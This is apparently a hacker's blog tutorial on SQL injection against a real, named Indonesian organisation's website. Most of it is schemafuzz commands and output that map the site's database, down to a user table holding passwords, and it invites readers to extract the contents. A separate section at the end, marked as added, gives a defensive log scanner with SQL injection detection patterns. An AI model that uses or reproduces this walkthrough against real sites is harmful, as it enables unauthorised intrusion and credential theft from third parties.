Get Your Freedom
Tonight, accompanied by a cigarette, I'll share a little about what I did this evening: SQL injection using my own schemafuzz build, which I edited from darkc0de. Before that, I thank the predecessors who have left so much knowledge to us, your successors. Hopefully our generation can continue your struggle to obtain the right information and knowledge of cyberspace. As for the schemafuzz script, I have provided it on the download page; please download it yourself. The file name is schemafuzz.
1. Find a target
For example: http://www.ditplb.or.id/profile.php?id=1
2. Enter the command to find the columns
Example: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1" --findcol
and this is what we get:
[+] URL: http://www.ditplb.or.id/profile.php?id=1--
[+] Evasion Used: "+" "--"
[+] 20:36:29
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,
[+] Column Length is: 3
[+] Found null column at column #: 2
[+] SQLi URL: http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,2--
[+] gen0l URL: http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,gen0l
[-] Done!
This means we use
http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,gen0l
for the injection.
3. Find the database with the --dbs command
Example: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,gen0l" --dbs
and this is what we get:
[+] URL: http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,gen0l--
[+] Evasion Used: "+" "--"
[+] 20:39:32
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t15618_plb
User: t15618_pl...@localhost
Version: 5.0.32-Debian_7etch8
[+] Showing all databases current user has access too!
[+] Number of Databases: 1
[0] t15618_plb
As we can see, the database name is t15618_plb.
4. Find the tables in the database
Example: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de" --schema -D namadatabase
So it becomes: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de" --schema -D t15618_plb
and this is what we get:
[+] URL: http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de--
[+] Evasion Used: "+" "--"
[+] 20:43:10
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t15618_plb
User: t15618_pl...@localhost
Version: 5.0.32-Debian_7etch8
[+] Showing Tables & Columns from database "t15618_plb"
[+] Number of Tables: 11
[Database]: t15618_plb
[Table: Columns]
[0]bukutamu: id,pengirim,email,pesan
[1]frm_daftarartikel: id_daf_art,id_kat,daftarartikel,pengirim
[2]frm_detailartikel: id_det_art,id_kat,id_daf_art,detailartikel,keterangan
[3]frm_kategori: id_kat,kategori
[4]kabupaten: ID_kab,ID_prop,Kabupaten
[5]pelatihan: ID,Pelatihan
[6]profile: ID_Profile,sinopsis,Profile
[7]propinsi: ID_prop,Propinsi
[8]sd: ID_sd,ID_1,SD,Detail
[9]sekolah: ID_sek,ID_prop,ID_kab,Sekolah,Alamat,Telp,Email
[10]user: ID_user,UserID,Password,Keterangan,Admin
[-] 20:44:39
[-] Total URL Requests 43
[-] Done
Now you just need to continue by finding the contents of that file.
Easy, isn't it? For more, you can contact me on YM.
This is for learning purposes only; there is no intention to commit a crime.
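How the requests in the tool output above look from the server side: an added example (not part of the original post and not schemafuzz code) that scans web access-log lines for the traits visible in the logged URLs, namely the UNION SELECT column sweep, the always-false predicate and the trailing "--". The log lines are constructed, and treating the id parameter as always numeric is an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines; client IPs and timestamps are made up for this example.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2010:20:30:02 +0700] "GET /profile.php?id=1 HTTP/1.1" 200 5120
198.51.100.7 - - [01/Jan/2010:20:36:29 +0700] "GET /profile.php?id=1+AND+1=2+UNION+SELECT+0-- HTTP/1.1" 200 811
198.51.100.7 - - [01/Jan/2010:20:36:30 +0700] "GET /profile.php?id=1+AND+1=2+UNION+SELECT+0,1-- HTTP/1.1" 200 811
198.51.100.7 - - [01/Jan/2010:20:36:31 +0700] "GET /profile.php?id=1+AND+1=2+UNION+SELECT+0,1,2-- HTTP/1.1" 200 5342
203.0.113.5 - - [01/Jan/2010:20:40:10 +0700] "GET /profile.php?id=2 HTTP/1.1" 200 4988
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" \d{3} ')
RULES = {
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "always-false-predicate": re.compile(r"\band\s+(\d+)\s*=\s*(?!\1\b)\d+", re.I),
    "trailing-sql-comment": re.compile(r"(?:--|#|/\*)\s*$"),
}
NUMERIC_PARAMS = {"id"}  # assumption: legitimate traffic only sends integers here

def findings_for(target):
    """Return the sorted rule names matched by any query parameter of one request."""
    hits = set()
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # parse_qsl has already decoded "+" and %xx, so the "+" evasion is gone here.
        if name in NUMERIC_PARAMS and not value.isdigit():
            hits.add("non-numeric-" + name)
        hits.update(rule for rule, rx in RULES.items() if rx.search(value))
    return sorted(hits)

def scan(log_text):
    """Map client IP -> list of (target, findings) for every flagged request."""
    flagged = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        hits = findings_for(m.group(2)) if m else []
        if hits:
            flagged[m.group(1)].append((m.group(2), hits))
    return dict(flagged)

def column_probe_clients(flagged, threshold=3):
    """Clients with >= threshold UNION SELECT requests: the column-count sweep pattern."""
    return sorted(c for c, reqs in flagged.items()
                  if sum("union-select" in h for _, h in reqs) >= threshold)

if __name__ == "__main__":
    report = scan(SAMPLE_LOG)
    print({c: len(r) for c, r in report.items()}, column_probe_clients(report))
```

The non-numeric check is the most robust of the four signals, and the same rule applied in the application (cast or validate id as an integer and bind it as a query parameter) is what stops the injection itself.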